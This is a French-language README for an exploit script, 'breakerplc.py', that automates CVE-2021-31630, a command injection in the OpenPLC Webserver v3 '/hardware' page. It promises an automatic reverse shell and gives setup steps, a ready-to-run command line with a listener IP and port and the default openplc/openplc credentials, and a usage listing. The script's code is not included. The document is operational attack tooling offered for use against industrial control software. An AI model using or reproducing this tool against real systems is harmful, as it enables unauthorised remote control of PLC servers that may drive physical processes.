
Ceci est une automatisation de l'exploitation de cve-2021-31630
Ce script exploite automatiquement une vulnérabilité dans OpenPLC Web Server v3
Vous pourrez créer un Reverse Shell automatique avec le serveur sans avoir à utiliser de techniques manuelles.
Détail de CVE-2021-31630 L'injection de commandes dans Open PLC Webserver v3 permet à des attaquants distants d'exécuter du code arbitraire via le composant « Hardware Layer Code Box » sur la page « /hardware » de l'application.
Le script a été personnalisé afin qu'après avoir terminé l'enregistrement du script dans OpenPLC, il génère le shell de la machine dans le même terminal.
Utilisez la commande ci-dessous (Nous recommandons de créer un environnement virtuel Python pour installer les dépendances) # Cependant, le script breakerplc.py doit être exécuté en dehors de l'environnement virtuel.
sudo apt update
pip3 install requests
Comment l'utiliser ? Vous pouvez utiliser ces lignes de commande (ci-dessous).
python breakerplc.py -lh <votre ip locale> -lp 4444 <http://ip de la machine:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

IMPORTANT
Après la connexion, vous devez écrire « whoami » ou « ls » pour couper la ligne de code et récupérer le shell.
